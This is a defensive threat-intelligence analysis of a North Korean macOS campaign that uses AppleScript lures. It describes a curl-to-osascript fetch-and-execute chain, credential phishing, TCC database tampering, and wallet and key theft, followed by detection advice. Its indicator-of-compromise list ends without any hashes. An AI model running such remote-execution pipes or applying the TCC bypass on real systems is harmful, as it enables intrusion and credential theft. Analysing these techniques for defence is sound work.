Technical Analysis: Sapphire Sleet’s Cascading AppleScript Payload Chain on macOS

Recent threat intelligence has uncovered a sophisticated macOS campaign attributed to the North Korean actor Sapphire Sleet. The campaign leverages highly crafted .scpt (AppleScript) lure files to execute a multi-stage, memory-resident payload chain. By utilizing a curl to osascript piping mechanism, the attackers are able to execute malicious logic entirely within the context of the macOS Script Editor, effectively bypassing traditional perimeter and endpoint protections.

The Initial Infection Vector: Social Engineering via Script Editor

The attack lifecycle begins with social engineering, where victims are prompted to download files masquerading as critical software updates or SDKs—such as Zoom SDK Update.scpt or msteams sdk update.scpt. When these files are opened, they appear legitimate to the untrained eye. The script is engineered to display an extensive block of benign-looking comments in the Script Editor, pushing the actual malicious instructions below the visible fold of the editor window.

Once the user initiates execution, the script invokes curl to fetch remote stages from a command-and-control (C2) server. Crucially, the output is piped directly into osascript (e.g., curl [URL] | osascript). This “fileless” approach allows the malware to trigger cascading execution stages—downloading components, registering the host with the C2, and deploying backdoors—without ever writing the initial stages to the physical disk.

This curl → osascript chaining provides several distinct operational advantages:

• Bypassing Security Checks: By executing within the user-initiated context of Script Editor, the activity sidesteps Gatekeeper, notarization requirements, and macOS quarantine checks.
• Dynamic Payload Delivery: The attackers use distinct User-Agent identifiers (ranging from mac-cur1 through mac-cur5) to facilitate per-stage payload selection, allowing them to tailor the infection based on the victim’s environment.

Payload Evolution and Persistence

The campaign utilizes a modular architecture to achieve its objectives. According to Microsoft Threat Intelligence, the various stages serve specific roles:

• Stage mac-cur1: Functions as an orchestrator and deploys a host monitoring component, often observed under the guise of legitimate-sounding names like com.apple.cli or com.microsoft.helper.
• Persistence: A dedicated services backdoor installs itself via launchd launchd property lists (plists) to ensure survival across reboots.
• Credential Harvesting (mac-cur2/mac-cur4): These stages deploy a malicious application named systemupdate.app. This app presents a native-looking macOS password prompt to the user. Once the user enters their credentials, the app exfiltrates them to the attacker via the Telegram Bot API.

TCC Manipulation and Data Exfiltration

To escalate privileges and access sensitive user data, Sapphire Sleet has developed methods to subvert macOS Transparency, Consent, and Control (TCC) protections. The malware programmatically manipulates the TCC database to grant itself unauthorized permissions.

The technique involves coercing the Finder process to allow read/write access to the TCC folder. The actors then use sqlite3 to inject AppleEvents grants for osascript into the TCC database, specifically targeting entries that satisfy Apple’s code-signing requirements. Once the database is restored, osascript gains silent, high-level AppleEvents privileges required for deep file system automation.

With TCC bypassed, the malware conducts an extensive sweep of high-value artifacts, including:

• Browser profiles and IndexedDB wallet data.
• Keychain files (which can be decrypted using the stolen user password).
• Telegram session data and SSH keys.
• Cryptocurrency wallet files (e.g., Ledger Live, Exodus).
• Apple Notes and system logs.

Data is exfiltrated using nohup-ed uploads, utilizing consistent upload headers tied to a unique device UUID to track victims.

Mitigation and Defensive Posture

In response to this campaign, Apple has deployed updated XProtect signatures and enhanced Safe Browsing protections. Simultaneously, Microsoft has expanded Microsoft Defender detections and released specific hunting queries to identify suspicious piped executions.

Recommended Security Controls:

1. Audit Scripting Activity: Monitor and, where possible, restrict the execution of unsigned .scpt files.
2. Monitor Interpreter Piping: Implement alerts for command-line patterns involving curl or wget being piped directly into osascript, bash, or python.
3. TCC Integrity: Heavily monitor any unauthorized attempts to access or modify Library/Application Support/com.apple.TCC/TCC.db.
4. Endpoint Hardening: Enforce the principle of least privilege and encourage the use of hardware security keys and hardware wallets for cryptocurrency workflows.

Indicators of Compromise (IoCs)

Malicious File Hashes (SHA-256)

Note: Security teams should verify these hashes within controlled environments.